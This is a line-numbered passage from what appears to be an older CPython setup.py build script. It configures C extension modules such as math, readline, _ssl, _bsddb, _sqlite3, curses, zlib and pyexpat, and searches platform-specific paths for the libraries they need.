401 | # Check for MacOS X, which doesn't need libm.a at all
402 | math_libs = ['m']
403 | if platform in ['darwin', 'beos', 'mac']:
404 | math_libs = []
405 |
406 | # XXX Omitted modules: gl, pure, dl, SGI-specific modules
407 |
408 | #
409 | # The following modules are all pretty straightforward, and compile
410 | # on pretty much any POSIXish platform.
411 | #
412 |
413 | # Some modules that are normally always on:
414 | exts.append( Extension('_weakref', ['_weakref.c']) )
415 |
416 | # array objects
417 | exts.append( Extension('array', ['arraymodule.c']) )
418 | # complex math library functions
419 | exts.append( Extension('cmath', ['cmathmodule.c'],
420 | libraries=math_libs) )
421 |
422 | # math library functions, e.g. sin()
423 | exts.append( Extension('math', ['mathmodule.c'],
424 | libraries=math_libs) )
425 | # fast string operations implemented in C
426 | exts.append( Extension('strop', ['stropmodule.c']) )
427 | # time operations and variables
428 | exts.append( Extension('time', ['timemodule.c'],
429 | libraries=math_libs) )
430 | exts.append( Extension('datetime', ['datetimemodule.c', 'timemodule.c'],
431 | libraries=math_libs) )
432 | # fast iterator tools implemented in C
433 | exts.append( Extension("itertools", ["itertoolsmodule.c"]) )
434 | # code that will be builtins in the future, but conflict with the
435 | # current builtins
436 | exts.append( Extension('future_builtins', ['future_builtins.c']) )
437 | # random number generator implemented in C
438 | exts.append( Extension("_random", ["_randommodule.c"]) )
439 | # high-performance collections
440 | exts.append( Extension("_collections", ["_collectionsmodule.c"]) )
441 | # bisect
442 | exts.append( Extension("_bisect", ["_bisectmodule.c"]) )
443 | # heapq
444 | exts.append( Extension("_heapq", ["_heapqmodule.c"]) )
445 | # operator.add() and similar goodies
446 | exts.append( Extension('operator', ['operator.c']) )
447 | # Python 3.0 _fileio module
448 | exts.append( Extension("_fileio", ["_fileio.c"]) )
449 | # Python 3.0 _bytesio module
450 | exts.append( Extension("_bytesio", ["_bytesio.c"]) )
451 | # _functools
452 | exts.append( Extension("_functools", ["_functoolsmodule.c"]) )
453 | # _json speedups
454 | exts.append( Extension("_json", ["_json.c"]) )
455 | # Python C API test module
456 | exts.append( Extension('_testcapi', ['_testcapimodule.c'],
457 | depends=['testcapi_long.h']) )
458 | # profilers (_lsprof is for cProfile.py)
459 | exts.append( Extension('_hotshot', ['_hotshot.c']) )
460 | exts.append( Extension('_lsprof', ['_lsprof.c', 'rotatingtree.c']) )
461 | # static Unicode character database
462 | if have_unicode:
463 | exts.append( Extension('unicodedata', ['unicodedata.c']) )
464 | else:
465 | missing.append('unicodedata')
466 | # access to ISO C locale support
467 | data = open('pyconfig.h').read()
468 | m = re.search(r"#s*define\s+WITH_LIBINTL\s+1\s*", data)
469 | if m is not None:
470 | locale_libs = ['intl']
471 | else:
472 | locale_libs = []
473 | if platform == 'darwin':
474 | locale_extra_link_args = ['-framework', 'CoreFoundation']
475 | else:
476 | locale_extra_link_args = []
477 |
478 |
479 | exts.append( Extension('_locale', ['_localemodule.c'],
480 | libraries=locale_libs,
481 | extra_link_args=locale_extra_link_args) )
482 |
483 | # Modules with some UNIX dependencies -- on by default:
484 | # (If you have a really backward UNIX, select and socket may not be
485 | # supported...)
486 |
487 | # fcntl(2) and ioctl(2)
488 | exts.append( Extension('fcntl', ['fcntlmodule.c']) )
489 | if platform not in ['mac']:
490 | # pwd(3)
491 | exts.append( Extension('pwd', ['pwdmodule.c']) )
492 | # grp(3)
493 | exts.append( Extension('grp', ['grpmodule.c']) )
494 | # spwd, shadow passwords
495 | if (config_h_vars.get('HAVE_GETSPNAM', False) or
496 | config_h_vars.get('HAVE_GETSPENT', False)):
497 | exts.append( Extension('spwd', ['spwdmodule.c']) )
498 | else:
499 | missing.append('spwd')
500 | else:
501 | missing.extend(['pwd', 'grp', 'spwd'])
502 |
503 | # select(2); not on ancient System V
504 | exts.append( Extension('select', ['selectmodule.c']) )
505 |
506 | # Fred Drake's interface to the Python parser
507 | exts.append( Extension('parser', ['parsermodule.c']) )
508 |
509 | # cStringIO and cPickle
510 | exts.append( Extension('cStringIO', ['cStringIO.c']) )
511 | exts.append( Extension('cPickle', ['cPickle.c']) )
512 |
513 | # Memory-mapped files (also works on Win32).
514 | if platform not in ['atheos', 'mac']:
515 | exts.append( Extension('mmap', ['mmapmodule.c']) )
516 | else:
517 | missing.append('mmap')
518 |
519 | # Lance Ellinghaus's syslog module
520 | if platform not in ['mac']:
521 | # syslog daemon interface
522 | exts.append( Extension('syslog', ['syslogmodule.c']) )
523 | else:
524 | missing.append('syslog')
525 |
526 | # George Neville-Neil's timing module:
527 | # Deprecated in PEP 4 http://www.python.org/peps/pep-0004.html
528 | # http://mail.python.org/pipermail/python-dev/2006-January/060023.html
529 | #exts.append( Extension('timing', ['timingmodule.c']) )
530 |
531 | #
532 | # Here ends the simple stuff. From here on, modules need certain
533 | # libraries, are platform-specific, or present other surprises.
534 | #
535 |
536 | # Multimedia modules
537 | # These don't work for 64-bit platforms!!!
538 | # These represent audio samples or images as strings:
539 |
540 | # Operations on audio samples
541 | # According to #993173, this one should actually work fine on
542 | # 64-bit platforms.
543 | exts.append( Extension('audioop', ['audioop.c']) )
544 |
545 | # Disabled on 64-bit platforms
546 | if sys.maxint != 9223372036854775807L:
547 | # Operations on images
548 | exts.append( Extension('imageop', ['imageop.c']) )
549 | else:
550 | missing.extend(['imageop'])
551 |
552 | # readline
553 | do_readline = self.compiler.find_library_file(lib_dirs, 'readline')
554 | if platform == 'darwin': # and os.uname()[2] < '9.':
555 | # MacOSX 10.4 has a broken readline. Don't try to build
556 | # the readline module unless the user has installed a fixed
557 | # readline package
558 | # FIXME: The readline emulation on 10.5 is better, but the
559 | # readline module doesn't compile out of the box.
560 | if find_file('readline/rlconf.h', inc_dirs, []) is None:
561 | do_readline = False
562 | if do_readline:
563 | if sys.platform == 'darwin':
564 | # In every directory on the search path search for a dynamic
565 | # library and then a static library, instead of first looking
566 | # for dynamic libraries on the entiry path.
567 | # This way a staticly linked custom readline gets picked up
568 | # before the (broken) dynamic library in /usr/lib.
569 | readline_extra_link_args = ('-Wl,-search_paths_first',)
570 | else:
571 | readline_extra_link_args = ()
572 |
573 | readline_libs = ['readline']
574 | if self.compiler.find_library_file(lib_dirs,
575 | 'ncursesw'):
576 | readline_libs.append('ncursesw')
577 | elif self.compiler.find_library_file(lib_dirs,
578 | 'ncurses'):
579 | readline_libs.append('ncurses')
580 | elif self.compiler.find_library_file(lib_dirs, 'curses'):
581 | readline_libs.append('curses')
582 | elif self.compiler.find_library_file(lib_dirs +
583 | ['/usr/lib/termcap'],
584 | 'termcap'):
585 | readline_libs.append('termcap')
586 | exts.append( Extension('readline', ['readline.c'],
587 | library_dirs=['/usr/lib/termcap'],
588 | extra_link_args=readline_extra_link_args,
589 | libraries=readline_libs) )
590 | else:
591 | missing.append('readline')
592 |
593 | if platform not in ['mac']:
594 | # crypt module.
595 |
596 | if self.compiler.find_library_file(lib_dirs, 'crypt'):
597 | libs = ['crypt']
598 | else:
599 | libs = []
600 | exts.append( Extension('crypt', ['cryptmodule.c'], libraries=libs) )
601 | else:
602 | missing.append('crypt')
603 |
604 | # CSV files
605 | exts.append( Extension('_csv', ['_csv.c']) )
606 |
607 | # socket(2)
608 | exts.append( Extension('_socket', ['socketmodule.c'],
609 | depends = ['socketmodule.h']) )
610 | # Detect SSL support for the socket module (via _ssl)
611 | search_for_ssl_incs_in = [
612 | '/usr/local/ssl/include',
613 | '/usr/contrib/ssl/include/'
614 | ]
615 | ssl_incs = find_file('openssl/ssl.h', inc_dirs,
616 | search_for_ssl_incs_in
617 | )
618 | if ssl_incs is not None:
619 | krb5_h = find_file('krb5.h', inc_dirs,
620 | ['/usr/kerberos/include'])
621 | if krb5_h:
622 | ssl_incs += krb5_h
623 | ssl_libs = find_library_file(self.compiler, 'ssl',lib_dirs,
624 | ['/usr/local/ssl/lib',
625 | '/usr/contrib/ssl/lib/'
626 | ] )
627 |
628 | if (ssl_incs is not None and
629 | ssl_libs is not None):
630 | exts.append( Extension('_ssl', ['_ssl.c'],
631 | include_dirs = ssl_incs,
632 | library_dirs = ssl_libs,
633 | libraries = ['ssl', 'crypto'],
634 | depends = ['socketmodule.h']), )
635 | else:
636 | missing.append('_ssl')
637 |
638 | # find out which version of OpenSSL we have
639 | openssl_ver = 0
640 | openssl_ver_re = re.compile(
641 | '^\s*#\s*define\s+OPENSSL_VERSION_NUMBER\s+(0x[0-9a-fA-F]+)' )
642 | for ssl_inc_dir in inc_dirs + search_for_ssl_incs_in:
643 | name = os.path.join(ssl_inc_dir, 'openssl', 'opensslv.h')
644 | if os.path.isfile(name):
645 | try:
646 | incfile = open(name, 'r')
647 | for line in incfile:
648 | m = openssl_ver_re.match(line)
649 | if m:
650 | openssl_ver = eval(m.group(1))
651 | break
652 | except IOError:
653 | pass
654 |
655 | # first version found is what we'll use (as the compiler should)
656 | if openssl_ver:
657 | break
658 |
659 | #print 'openssl_ver = 0x%08x' % openssl_ver
660 |
661 | if (ssl_incs is not None and
662 | ssl_libs is not None and
663 | openssl_ver >= 0x00907000):
664 | # The _hashlib module wraps optimized implementations
665 | # of hash functions from the OpenSSL library.
666 | exts.append( Extension('_hashlib', ['_hashopenssl.c'],
667 | include_dirs = ssl_incs,
668 | library_dirs = ssl_libs,
669 | libraries = ['ssl', 'crypto']) )
670 | # these aren't strictly missing since they are unneeded.
671 | #missing.extend(['_sha', '_md5'])
672 | else:
673 | # The _sha module implements the SHA1 hash algorithm.
674 | exts.append( Extension('_sha', ['shamodule.c']) )
675 | # The _md5 module implements the RSA Data Security, Inc. MD5
676 | # Message-Digest Algorithm, described in RFC 1321. The
677 | # necessary files md5.c and md5.h are included here.
678 | exts.append( Extension('_md5',
679 | sources = ['md5module.c', 'md5.c'],
680 | depends = ['md5.h']) )
681 | missing.append('_hashlib')
682 |
683 | if (openssl_ver < 0x00908000):
684 | # OpenSSL doesn't do these until 0.9.8 so we'll bring our own hash
685 | exts.append( Extension('_sha256', ['sha256module.c']) )
686 | exts.append( Extension('_sha512', ['sha512module.c']) )
687 |
688 | # Modules that provide persistent dictionary-like semantics. You will
689 | # probably want to arrange for at least one of them to be available on
690 | # your machine, though none are defined by default because of library
691 | # dependencies. The Python module anydbm.py provides an
692 | # implementation independent wrapper for these; dumbdbm.py provides
693 | # similar functionality (but slower of course) implemented in Python.
694 |
695 | # Sleepycat^WOracle Berkeley DB interface.
696 | # http://www.oracle.com/database/berkeley-db/db/index.html
697 | #
698 | # This requires the Sleepycat^WOracle DB code. The supported versions
699 | # are set below. Visit the URL above to download
700 | # a release. Most open source OSes come with one or more
701 | # versions of BerkeleyDB already installed.
702 |
703 | max_db_ver = (4, 7)
704 | min_db_ver = (3, 3)
705 | db_setup_debug = False # verbose debug prints from this script?
706 |
707 | def allow_db_ver(db_ver):
708 | """Returns a boolean if the given BerkeleyDB version is acceptable.
709 |
710 | Args:
711 | db_ver: A tuple of the version to verify.
712 | """
713 | if not (min_db_ver <= db_ver <= max_db_ver):
714 | return False
715 | # Use this function to filter out known bad configurations.
716 | if (4, 6) == db_ver[:2]:
717 | # BerkeleyDB 4.6.x is not stable on many architectures.
718 | arch = platform_machine()
719 | if arch not in ('i386', 'i486', 'i586', 'i686',
720 | 'x86_64', 'ia64'):
721 | return False
722 | return True
723 |
724 | def gen_db_minor_ver_nums(major):
725 | if major == 4:
726 | for x in range(max_db_ver[1]+1):
727 | if allow_db_ver((4, x)):
728 | yield x
729 | elif major == 3:
730 | for x in (3,):
731 | if allow_db_ver((3, x)):
732 | yield x
733 | else:
734 | raise ValueError("unknown major BerkeleyDB version", major)
735 |
736 | # construct a list of paths to look for the header file in on
737 | # top of the normal inc_dirs.
738 | db_inc_paths = [
739 | '/usr/include/db4',
740 | '/usr/local/include/db4',
741 | '/opt/sfw/include/db4',
742 | '/usr/include/db3',
743 | '/usr/local/include/db3',
744 | '/opt/sfw/include/db3',
745 | # Fink defaults (http://fink.sourceforge.net/)
746 | '/sw/include/db4',
747 | '/sw/include/db3',
748 | ]
749 | # 4.x minor number specific paths
750 | for x in gen_db_minor_ver_nums(4):
751 | db_inc_paths.append('/usr/include/db4%d' % x)
752 | db_inc_paths.append('/usr/include/db4.%d' % x)
753 | db_inc_paths.append('/usr/local/BerkeleyDB.4.%d/include' % x)
754 | db_inc_paths.append('/usr/local/include/db4%d' % x)
755 | db_inc_paths.append('/pkg/db-4.%d/include' % x)
756 | db_inc_paths.append('/opt/db-4.%d/include' % x)
757 | # MacPorts default (http://www.macports.org/)
758 | db_inc_paths.append('/opt/local/include/db4%d' % x)
759 | # 3.x minor number specific paths
760 | for x in gen_db_minor_ver_nums(3):
761 | db_inc_paths.append('/usr/include/db3%d' % x)
762 | db_inc_paths.append('/usr/local/BerkeleyDB.3.%d/include' % x)
763 | db_inc_paths.append('/usr/local/include/db3%d' % x)
764 | db_inc_paths.append('/pkg/db-3.%d/include' % x)
765 | db_inc_paths.append('/opt/db-3.%d/include' % x)
766 |
767 | # Add some common subdirectories for Sleepycat DB to the list,
768 | # based on the standard include directories. This way DB3/4 gets
769 | # picked up when it is installed in a non-standard prefix and
770 | # the user has added that prefix into inc_dirs.
771 | std_variants = []
772 | for dn in inc_dirs:
773 | std_variants.append(os.path.join(dn, 'db3'))
774 | std_variants.append(os.path.join(dn, 'db4'))
775 | for x in gen_db_minor_ver_nums(4):
776 | std_variants.append(os.path.join(dn, "db4%d"%x))
777 | std_variants.append(os.path.join(dn, "db4.%d"%x))
778 | for x in gen_db_minor_ver_nums(3):
779 | std_variants.append(os.path.join(dn, "db3%d"%x))
780 | std_variants.append(os.path.join(dn, "db3.%d"%x))
781 |
782 | db_inc_paths = std_variants + db_inc_paths
783 | db_inc_paths = [p for p in db_inc_paths if os.path.exists(p)]
784 |
785 | db_ver_inc_map = {}
786 |
787 | class db_found(Exception): pass
788 | try:
789 | # See whether there is a Sleepycat header in the standard
790 | # search path.
791 | for d in inc_dirs + db_inc_paths:
792 | f = os.path.join(d, "db.h")
793 | if db_setup_debug: print "db: looking for db.h in", f
794 | if os.path.exists(f):
795 | f = open(f).read()
796 | m = re.search(r"#define\WDB_VERSION_MAJOR\W(\d+)", f)
797 | if m:
798 | db_major = int(m.group(1))
799 | m = re.search(r"#define\WDB_VERSION_MINOR\W(\d+)", f)
800 | db_minor = int(m.group(1))
801 | db_ver = (db_major, db_minor)
802 |
803 | # Avoid 4.6 prior to 4.6.21 due to a BerkeleyDB bug
804 | if db_ver == (4, 6):
805 | m = re.search(r"#define\WDB_VERSION_PATCH\W(\d+)", f)
806 | db_patch = int(m.group(1))
807 | if db_patch < 21:
808 | print "db.h:", db_ver, "patch", db_patch,
809 | print "being ignored (4.6.x must be >= 4.6.21)"
810 | continue
811 |
812 | if ( (not db_ver_inc_map.has_key(db_ver)) and
813 | allow_db_ver(db_ver) ):
814 | # save the include directory with the db.h version
815 | # (first occurrence only)
816 | db_ver_inc_map[db_ver] = d
817 | if db_setup_debug:
818 | print "db.h: found", db_ver, "in", d
819 | else:
820 | # we already found a header for this library version
821 | if db_setup_debug: print "db.h: ignoring", d
822 | else:
823 | # ignore this header, it didn't contain a version number
824 | if db_setup_debug:
825 | print "db.h: no version number version in", d
826 |
827 | db_found_vers = db_ver_inc_map.keys()
828 | db_found_vers.sort()
829 |
830 | while db_found_vers:
831 | db_ver = db_found_vers.pop()
832 | db_incdir = db_ver_inc_map[db_ver]
833 |
834 | # check lib directories parallel to the location of the header
835 | db_dirs_to_check = [
836 | db_incdir.replace("include", 'lib64'),
837 | db_incdir.replace("include", 'lib'),
838 | ]
839 | db_dirs_to_check = filter(os.path.isdir, db_dirs_to_check)
840 |
841 | # Look for a version specific db-X.Y before an ambiguoius dbX
842 | # XXX should we -ever- look for a dbX name? Do any
843 | # systems really not name their library by version and
844 | # symlink to more general names?
845 | for dblib in (('db-%d.%d' % db_ver),
846 | ('db%d%d' % db_ver),
847 | ('db%d' % db_ver[0])):
848 | dblib_file = self.compiler.find_library_file(
849 | db_dirs_to_check + lib_dirs, dblib )
850 | if dblib_file:
851 | dblib_dir = [ os.path.abspath(os.path.dirname(dblib_file)) ]
852 | raise db_found
853 | else:
854 | if db_setup_debug: print "db lib: ", dblib, "not found"
855 |
856 | except db_found:
857 | if db_setup_debug:
858 | print "bsddb using BerkeleyDB lib:", db_ver, dblib
859 | print "bsddb lib dir:", dblib_dir, " inc dir:", db_incdir
860 | db_incs = [db_incdir]
861 | dblibs = [dblib]
862 | # We add the runtime_library_dirs argument because the
863 | # BerkeleyDB lib we're linking against often isn't in the
864 | # system dynamic library search path. This is usually
865 | # correct and most trouble free, but may cause problems in
866 | # some unusual system configurations (e.g. the directory
867 | # is on an NFS server that goes away).
868 | exts.append(Extension('_bsddb', ['_bsddb.c'],
869 | depends = ['bsddb.h'],
870 | library_dirs=dblib_dir,
871 | runtime_library_dirs=dblib_dir,
872 | include_dirs=db_incs,
873 | libraries=dblibs))
874 | else:
875 | if db_setup_debug: print "db: no appropriate library found"
876 | db_incs = None
877 | dblibs = []
878 | dblib_dir = None
879 | missing.append('_bsddb')
880 |
881 | # The sqlite interface
882 | sqlite_setup_debug = False # verbose debug prints from this script?
883 |
884 | # We hunt for #define SQLITE_VERSION "n.n.n"
885 | # We need to find >= sqlite version 3.0.8
886 | sqlite_incdir = sqlite_libdir = None
887 | sqlite_inc_paths = [ '/usr/include',
888 | '/usr/include/sqlite',
889 | '/usr/include/sqlite3',
890 | '/usr/local/include',
891 | '/usr/local/include/sqlite',
892 | '/usr/local/include/sqlite3',
893 | ]
894 | MIN_SQLITE_VERSION_NUMBER = (3, 0, 8)
895 | MIN_SQLITE_VERSION = ".".join([str(x)
896 | for x in MIN_SQLITE_VERSION_NUMBER])
897 |
898 | # Scan the default include directories before the SQLite specific
899 | # ones. This allows one to override the copy of sqlite on OSX,
900 | # where /usr/include contains an old version of sqlite.
901 | for d in inc_dirs + sqlite_inc_paths:
902 | f = os.path.join(d, "sqlite3.h")
903 | if os.path.exists(f):
904 | if sqlite_setup_debug: print "sqlite: found %s"%f
905 | incf = open(f).read()
906 | m = re.search(
907 | r'\s*.*#\s*.*define\s.*SQLITE_VERSION\W*"(.*)"', incf)
908 | if m:
909 | sqlite_version = m.group(1)
910 | sqlite_version_tuple = tuple([int(x)
911 | for x in sqlite_version.split(".")])
912 | if sqlite_version_tuple >= MIN_SQLITE_VERSION_NUMBER:
913 | # we win!
914 | if sqlite_setup_debug:
915 | print "%s/sqlite3.h: version %s"%(d, sqlite_version)
916 | sqlite_incdir = d
917 | break
918 | else:
919 | if sqlite_setup_debug:
920 | print "%s: version %d is too old, need >= %s"%(d,
921 | sqlite_version, MIN_SQLITE_VERSION)
922 | elif sqlite_setup_debug:
923 | print "sqlite: %s had no SQLITE_VERSION"%(f,)
924 |
925 | if sqlite_incdir:
926 | sqlite_dirs_to_check = [
927 | os.path.join(sqlite_incdir, '..', 'lib64'),
928 | os.path.join(sqlite_incdir, '..', 'lib'),
929 | os.path.join(sqlite_incdir, '..', '..', 'lib64'),
930 | os.path.join(sqlite_incdir, '..', '..', 'lib'),
931 | ]
932 | sqlite_libfile = self.compiler.find_library_file(
933 | sqlite_dirs_to_check + lib_dirs, 'sqlite3')
934 | if sqlite_libfile:
935 | sqlite_libdir = [os.path.abspath(os.path.dirname(sqlite_libfile))]
936 |
937 | if sqlite_incdir and sqlite_libdir:
938 | sqlite_srcs = ['_sqlite/cache.c',
939 | '_sqlite/connection.c',
940 | '_sqlite/cursor.c',
941 | '_sqlite/microprotocols.c',
942 | '_sqlite/module.c',
943 | '_sqlite/prepare_protocol.c',
944 | '_sqlite/row.c',
945 | '_sqlite/statement.c',
946 | '_sqlite/util.c', ]
947 |
948 | sqlite_defines = []
949 | if sys.platform != "win32":
950 | sqlite_defines.append(('MODULE_NAME', '"sqlite3"'))
951 | else:
952 | sqlite_defines.append(('MODULE_NAME', '\\"sqlite3\\"'))
953 |
954 |
955 | if sys.platform == 'darwin':
956 | # In every directory on the search path search for a dynamic
957 | # library and then a static library, instead of first looking
958 | # for dynamic libraries on the entiry path.
959 | # This way a staticly linked custom sqlite gets picked up
960 | # before the dynamic library in /usr/lib.
961 | sqlite_extra_link_args = ('-Wl,-search_paths_first',)
962 | else:
963 | sqlite_extra_link_args = ()
964 |
965 | exts.append(Extension('_sqlite3', sqlite_srcs,
966 | define_macros=sqlite_defines,
967 | include_dirs=["Modules/_sqlite",
968 | sqlite_incdir],
969 | library_dirs=sqlite_libdir,
970 | runtime_library_dirs=sqlite_libdir,
971 | extra_link_args=sqlite_extra_link_args,
972 | libraries=["sqlite3",]))
973 | else:
974 | missing.append('_sqlite3')
975 |
976 | # Look for Berkeley db 1.85. Note that it is built as a different
977 | # module name so it can be included even when later versions are
978 | # available. A very restrictive search is performed to avoid
979 | # accidentally building this module with a later version of the
980 | # underlying db library. May BSD-ish Unixes incorporate db 1.85
981 | # symbols into libc and place the include file in /usr/include.
982 | #
983 | # If the better bsddb library can be built (db_incs is defined)
984 | # we do not build this one. Otherwise this build will pick up
985 | # the more recent berkeleydb's db.h file first in the include path
986 | # when attempting to compile and it will fail.
987 | f = "/usr/include/db.h"
988 | if os.path.exists(f) and not db_incs:
989 | data = open(f).read()
990 | m = re.search(r"#s*define\s+HASHVERSION\s+2\s*", data)
991 | if m is not None:
992 | # bingo - old version used hash file format version 2
993 | ### XXX this should be fixed to not be platform-dependent
994 | ### but I don't have direct access to an osf1 platform and
995 | ### seemed to be muffing the search somehow
996 | libraries = platform == "osf1" and ['db'] or None
997 | if libraries is not None:
998 | exts.append(Extension('bsddb185', ['bsddbmodule.c'],
999 | libraries=libraries))
1000 | else:
1001 | exts.append(Extension('bsddb185', ['bsddbmodule.c']))
1002 | else:
1003 | missing.append('bsddb185')
1004 | else:
1005 | missing.append('bsddb185')
1006 |
1007 | # The standard Unix dbm module:
1008 | if platform not in ['cygwin']:
1009 | if find_file("ndbm.h", inc_dirs, []) is not None:
1010 | # Some systems have -lndbm, others don't
1011 | if self.compiler.find_library_file(lib_dirs, 'ndbm'):
1012 | ndbm_libs = ['ndbm']
1013 | else:
1014 | ndbm_libs = []
1015 | exts.append( Extension('dbm', ['dbmmodule.c'],
1016 | define_macros=[('HAVE_NDBM_H',None)],
1017 | libraries = ndbm_libs ) )
1018 | elif self.compiler.find_library_file(lib_dirs, 'gdbm'):
1019 | gdbm_libs = ['gdbm']
1020 | if self.compiler.find_library_file(lib_dirs, 'gdbm_compat'):
1021 | gdbm_libs.append('gdbm_compat')
1022 | if find_file("gdbm/ndbm.h", inc_dirs, []) is not None:
1023 | exts.append( Extension(
1024 | 'dbm', ['dbmmodule.c'],
1025 | define_macros=[('HAVE_GDBM_NDBM_H',None)],
1026 | libraries = gdbm_libs ) )
1027 | elif find_file("gdbm-ndbm.h", inc_dirs, []) is not None:
1028 | exts.append( Extension(
1029 | 'dbm', ['dbmmodule.c'],
1030 | define_macros=[('HAVE_GDBM_DASH_NDBM_H',None)],
1031 | libraries = gdbm_libs ) )
1032 | else:
1033 | missing.append('dbm')
1034 | elif db_incs is not None:
1035 | exts.append( Extension('dbm', ['dbmmodule.c'],
1036 | library_dirs=dblib_dir,
1037 | runtime_library_dirs=dblib_dir,
1038 | include_dirs=db_incs,
1039 | define_macros=[('HAVE_BERKDB_H',None),
1040 | ('DB_DBM_HSEARCH',None)],
1041 | libraries=dblibs))
1042 | else:
1043 | missing.append('dbm')
1044 |
1045 | # Anthony Baxter's gdbm module. GNU dbm(3) will require -lgdbm:
1046 | if (self.compiler.find_library_file(lib_dirs, 'gdbm')):
1047 | exts.append( Extension('gdbm', ['gdbmmodule.c'],
1048 | libraries = ['gdbm'] ) )
1049 | else:
1050 | missing.append('gdbm')
1051 |
1052 | # Unix-only modules
1053 | if platform not in ['mac', 'win32']:
1054 | # Steen Lumholt's termios module
1055 | exts.append( Extension('termios', ['termios.c']) )
1056 | # Jeremy Hylton's rlimit interface
1057 | if platform not in ['atheos']:
1058 | exts.append( Extension('resource', ['resource.c']) )
1059 | else:
1060 | missing.append('resource')
1061 |
1062 | # Sun yellow pages. Some systems have the functions in libc.
1063 | if platform not in ['cygwin', 'atheos', 'qnx6']:
1064 | if (self.compiler.find_library_file(lib_dirs, 'nsl')):
1065 | libs = ['nsl']
1066 | else:
1067 | libs = []
1068 | exts.append( Extension('nis', ['nismodule.c'],
1069 | libraries = libs) )
1070 | else:
1071 | missing.append('nis')
1072 | else:
1073 | missing.extend(['nis', 'resource', 'termios'])
1074 |
1075 | # Curses support, requiring the System V version of curses, often
1076 | # provided by the ncurses library.
1077 | panel_library = 'panel'
1078 | if (self.compiler.find_library_file(lib_dirs, 'ncursesw')):
1079 | curses_libs = ['ncursesw']
1080 | # Bug 1464056: If _curses.so links with ncursesw,
1081 | # _curses_panel.so must link with panelw.
1082 | panel_library = 'panelw'
1083 | exts.append( Extension('_curses', ['_cursesmodule.c'],
1084 | libraries = curses_libs) )
1085 | elif (self.compiler.find_library_file(lib_dirs, 'ncurses')):
1086 | curses_libs = ['ncurses']
1087 | exts.append( Extension('_curses', ['_cursesmodule.c'],
1088 | libraries = curses_libs) )
1089 | elif (self.compiler.find_library_file(lib_dirs, 'curses')
1090 | and platform != 'darwin'):
1091 | # OSX has an old Berkeley curses, not good enough for
1092 | # the _curses module.
1093 | if (self.compiler.find_library_file(lib_dirs, 'terminfo')):
1094 | curses_libs = ['curses', 'terminfo']
1095 | elif (self.compiler.find_library_file(lib_dirs, 'termcap')):
1096 | curses_libs = ['curses', 'termcap']
1097 | else:
1098 | curses_libs = ['curses']
1099 |
1100 | exts.append( Extension('_curses', ['_cursesmodule.c'],
1101 | libraries = curses_libs) )
1102 | else:
1103 | missing.append('_curses')
1104 |
1105 | # If the curses module is enabled, check for the panel module
1106 | if (module_enabled(exts, '_curses') and
1107 | self.compiler.find_library_file(lib_dirs, panel_library)):
1108 | exts.append( Extension('_curses_panel', ['_curses_panel.c'],
1109 | libraries = [panel_library] + curses_libs) )
1110 | else:
1111 | missing.append('_curses_panel')
1112 |
1113 | # Andrew Kuchling's zlib module. Note that some versions of zlib
1114 | # 1.1.3 have security problems. See CERT Advisory CA-2002-07:
1115 | # http://www.cert.org/advisories/CA-2002-07.html
1116 | #
1117 | # zlib 1.1.4 is fixed, but at least one vendor (RedHat) has decided to
1118 | # patch its zlib 1.1.3 package instead of upgrading to 1.1.4. For
1119 | # now, we still accept 1.1.3, because we think it's difficult to
1120 | # exploit this in Python, and we'd rather make it RedHat's problem
1121 | # than our problem .
1122 | #
1123 | # You can upgrade zlib to version 1.1.4 yourself by going to
1124 | # http://www.gzip.org/zlib/
1125 | zlib_inc = find_file('zlib.h', [], inc_dirs)
1126 | have_zlib = False
1127 | if zlib_inc is not None:
1128 | zlib_h = zlib_inc[0] + '/zlib.h'
1129 | version = '"0.0.0"'
1130 | version_req = '"1.1.3"'
1131 | fp = open(zlib_h)
1132 | while 1:
1133 | line = fp.readline()
1134 | if not line:
1135 | break
1136 | if line.startswith('#define ZLIB_VERSION'):
1137 | version = line.split()[2]
1138 | break
1139 | if version >= version_req:
1140 | if (self.compiler.find_library_file(lib_dirs, 'z')):
1141 | if sys.platform == "darwin":
1142 | zlib_extra_link_args = ('-Wl,-search_paths_first',)
1143 | else:
1144 | zlib_extra_link_args = ()
1145 | exts.append( Extension('zlib', ['zlibmodule.c'],
1146 | libraries = ['z'],
1147 | extra_link_args = zlib_extra_link_args))
1148 | have_zlib = True
1149 | else:
1150 | missing.append('zlib')
1151 | else:
1152 | missing.append('zlib')
1153 | else:
1154 | missing.append('zlib')
1155 |
1156 | # Helper module for various ascii-encoders. Uses zlib for an optimized
1157 | # crc32 if we have it. Otherwise binascii uses its own.
1158 | if have_zlib:
1159 | extra_compile_args = ['-DUSE_ZLIB_CRC32']
1160 | libraries = ['z']
1161 | extra_link_args = zlib_extra_link_args
1162 | else:
1163 | extra_compile_args = []
1164 | libraries = []
1165 | extra_link_args = []
1166 | exts.append( Extension('binascii', ['binascii.c'],
1167 | extra_compile_args = extra_compile_args,
1168 | libraries = libraries,
1169 | extra_link_args = extra_link_args) )
1170 |
1171 | # Gustavo Niemeyer's bz2 module.
1172 | if (self.compiler.find_library_file(lib_dirs, 'bz2')):
1173 | if sys.platform == "darwin":
1174 | bz2_extra_link_args = ('-Wl,-search_paths_first',)
1175 | else:
1176 | bz2_extra_link_args = ()
1177 | exts.append( Extension('bz2', ['bz2module.c'],
1178 | libraries = ['bz2'],
1179 | extra_link_args = bz2_extra_link_args) )
1180 | else:
1181 | missing.append('bz2')
1182 |
1183 | # Interface to the Expat XML parser
1184 | #
1185 | # Expat was written by James Clark and is now maintained by a
1186 | # group of developers on SourceForge; see www.libexpat.org for
1187 | # more information. The pyexpat module was written by Paul
1188 | # Prescod after a prototype by Jack Jansen. The Expat source
1189 | # is included in Modules/expat/. Usage of a system
1190 | # shared libexpat.so/expat.dll is not advised.
1191 | #
1192 | # More information on Expat can be found at www.libexpat.org.
1193 | #
1194 | expatinc = os.path.join(os.getcwd(), srcdir, 'Modules', 'expat')
1195 | define_macros = [
1196 | ('HAVE_EXPAT_CONFIG_H', '1'),
1197 | ]
1198 |
1199 | exts.append(Extension('pyexpat',
1200 | define_macros = define_macros,
1201 | include_dirs = [expatinc],
1202 | sources = ['pyexpat.c',
1203 | 'expat/xmlparse.c',
1204 | 'expat/xmlrole.c',
1205 | 'expat/xmltok.c',
1206 | ],
1207 | ))
1208 |
1209 | # Fredrik Lundh's cElementTree module. Note that this also
1210 | # uses expat (via the CAPI hook in pyexpat).
1211 |
1212 | if os.path.isfile(os.path.join(srcdir, 'Modules', '_elementtree.c')):
1213 | define_macros.append(('USE_PYEXPAT_CAPI', None))
1214 | exts.append(Extension('_elementtree',
1215 | define_macros = define_macros,
